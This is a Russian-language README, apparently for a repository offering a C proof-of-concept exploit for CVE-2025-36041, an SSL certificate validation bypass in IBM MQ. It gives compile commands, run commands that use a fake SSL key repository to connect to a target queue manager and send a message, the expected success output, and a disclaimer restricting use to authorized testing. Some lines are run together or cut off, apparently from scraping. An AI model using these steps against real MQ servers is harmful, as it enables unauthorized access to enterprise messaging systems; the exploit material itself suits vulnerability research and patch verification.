
Эксплойт (C) уязвимости CVE-2025-36041 в IBM MQ
Этот репозиторий содержит proof-of-concept (PoC) эксплойт для CVE-2025-36041, уязвимости в IBM MQ (Message Queue), которая позволяет обойти проверку SSL-сертификата. Внедряя поддельный SSL-сертификат и используя настроенные параметры MQCONNX, можно установить несанкционированное клиентское соединение с сервером IBM MQ.
"Hello MQ") для подтверждения успешной эксплуатации.Убедитесь, что клиентские библиотеки IBM MQ установлены, а переменные окружения (MQ_INCLUDE_PATH, ) настроены соответствующим образом.
MQ_LIB_PATHgcc exploit.c argparse.c -o CVE-2025-36041
-I/path/to/mqm/include
-L/path/to/mqm/lib -lmqm
./CVE-2025-36041
-p /path/to/fake/ssl
-n TARGET.QUEUE.NAME
-m QM1
Параметры:
-p, --path Путь к каталогу поддельного SSL-хранилища ключей.-n, --name Имя целевой очереди для открытия и отправки сообщения.-m, --qmgr Имя менеджера очередей../CVE-2025-36041 -p ./fake_ssl_repo -n MY.QUEUE -m QM1
В случае успеха вы увидите:
[+] Starting connection to IBM MQ... [+] Connected successfully with fake SSL! [+] Message sent successfully!
Только для авторизованного тестирования на проникновение и образовательных целей. Несанкционированное использование этого PoC может нарушить местные законы и правила. Автор не несет ответственности за неправомерное использование.
Автор: Byte Reaper CVE: CVE-2025-36041